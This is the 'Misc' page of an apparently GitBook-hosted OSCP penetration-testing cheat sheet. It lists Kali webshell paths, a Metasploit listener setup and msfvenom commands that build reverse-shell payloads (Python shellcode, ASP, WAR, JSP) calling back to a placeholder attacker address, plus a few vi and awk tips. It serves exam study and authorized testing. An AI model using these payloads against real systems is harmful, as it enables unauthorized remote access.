Securable - OSCP cheat sheet
Search…
Securable - OSCP cheat sheet
Introduction
Reconnaissance & enumeration
Gaining access
Privilege escalation
Post exploitation
Lateral movement
Buffer overflow
Misc
Powered By
GitBook
Misc
Msfvenom, linux, etc.
Kali default shells
1
/usr/share/webshells/php/php-reverse-shell.php
2
/usr/share/webshells/php/simple-backdoor.php
Copied!
Msfvenom
Show all payloads
1
msfvenom -l payloads
Copied!
Set handler
1
msfconsole
2
use exploit/multi/handler
3
set lhost x.x.x.x
4
set lport 6969
5
exploit
Copied!
Windows
Python (non-staged)
1
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=6969 EXITFUNC=thread -b "\x00" -f python -v shellcode
Copied!
ASP (non-staged)
1
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=6969 -f asp > shell.asp
Copied!
Linux
Java WAR (non-staged)
1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=6969 -f war > shell.war
Copied!
JSP (non-staged)
1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=6969 -f raw > shell.jsp
Copied!
Linux shizzle
Vi
Remove first 5 characters from all lines in file:
1
:%s/^.\{5}//
Copied!
Remove last 5 characters from all lines in file:
1
:%s/.\{5}$//
Copied!
Awk
Remove duplicate lines:
1
awk '!seen[$0]++' file
Copied!
Previous
Buffer overflow
Last modified
2yr ago
Copy link
Contents
Kali default shells
Msfvenom
Show all payloads
Set handler
Windows
Linux
Linux shizzle
Vi
Awk